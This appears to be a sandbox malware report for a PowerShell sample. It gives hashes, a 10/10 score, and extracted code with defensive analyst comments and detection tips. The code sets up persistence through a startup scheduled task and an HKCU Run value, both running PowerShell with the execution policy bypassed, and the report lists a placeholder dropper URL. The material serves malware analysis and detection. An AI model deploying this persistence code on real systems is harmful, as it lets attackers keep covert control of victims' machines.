General

  • Target

    code.ps1

  • Size

    3KB

  • MD5

    259ad591b830b483e84b4f995f35838e

  • SHA1

    39be4b78a4f7d7956d21a6917f1687dc77d7847b

  • SHA256

    865c27bc6fd0781cec11c4d0c0797e370a2e88f9db9f9aa25a72de7817a428fd

  • SHA512

    b4eeff16b50c6b0f60fcc21a70b5a95358f8b3399fc6a08576b5e3751489462daf373be789832cefedb73fe07f959c33c499ff9f32b5e6da54f57061140c32ee

Score
10/10

Malware Config

Extracted

Language
ps1
Source
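# Create a persistent scheduled task
#
# Analyst notes (defensive reading of the extracted sample):
#   * Technique: persistence through Task Scheduler (MITRE ATT&CK T1053.005).
#   * The task name and script path look like placeholders, so the behaviour
#     (a boot-time task that runs powershell.exe with an execution-policy
#     override) is the useful indicator, not these literal strings.
#   * Where to look: Security event 4698 (scheduled task created; needs
#     "Audit Other Object Access Events"), event 106 in
#     Microsoft-Windows-TaskScheduler/Operational, and new entries under
#     C:\Windows\System32\Tasks.
#   * NOTE(review): the report lists a dropper URL that does not appear in
#     these extracted lines, so this listing is probably only part of the
#     3KB sample. Confirm against the full file.
#   * The viewer's line-number gutter was interleaved with the code; it has
#     been dropped here because bare integers are evaluated as expressions
#     in PowerShell. The statements themselves are unchanged.
$taskName = "MaliciousTask"
# Action: start powershell.exe without loading a profile and with the execution
# policy overridden for this one process. Execution policy is not a security
# boundary; application control (WDAC/AppLocker) and Script Block Logging
# (event 4104) are the controls that constrain or record this.
$taskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-NoProfile -ExecutionPolicy Bypass -File C:\Path\To\MaliciousScript.ps1"
# Trigger: fires when the system starts, not when a user logs on.
$taskTrigger = New-ScheduledTaskTrigger -AtStartup
# Settings: allow start and continued running on battery power, and run as soon
# as possible after a missed start (StartWhenAvailable).
$taskSettings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable
# No -User or -Principal is supplied, so the run-as account is not fixed by
# this line. NOTE(review): confirm the principal from the registered task
# definition in the sandbox artefacts.
Register-ScheduledTask -TaskName $taskName -Action $taskAction -Trigger $taskTrigger -Settings $taskSettings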
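# Create a registry key for persistence
#
# Analyst notes (defensive reading of the extracted sample):
#   * Technique: Run-key persistence (MITRE ATT&CK T1547.001). The call sets a
#     value under the existing per-user Run key rather than creating a key.
#   * The hive is HKCU, so the write targets the current user's profile and the
#     command is launched at that user's logon.
#   * The value name and script path look like placeholders. Hunt on the value
#     data pattern (powershell.exe with -ExecutionPolicy Bypass -File) instead.
#   * Where to look: Sysmon Event ID 13 (registry value set) on
#     ...\CurrentVersion\Run, or a baseline comparison of autostart entries.
#   * The viewer's line-number gutter line between the comment and the
#     statement has been dropped. The statement itself is unchanged.
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "MaliciousRegistryEntry" -Value "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Path\To\MaliciousScript.ps1"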
URLs
exe.dropper

http://malicious-server.com/payload.exe

Signatures

Files

  • code.ps1
    .ps1
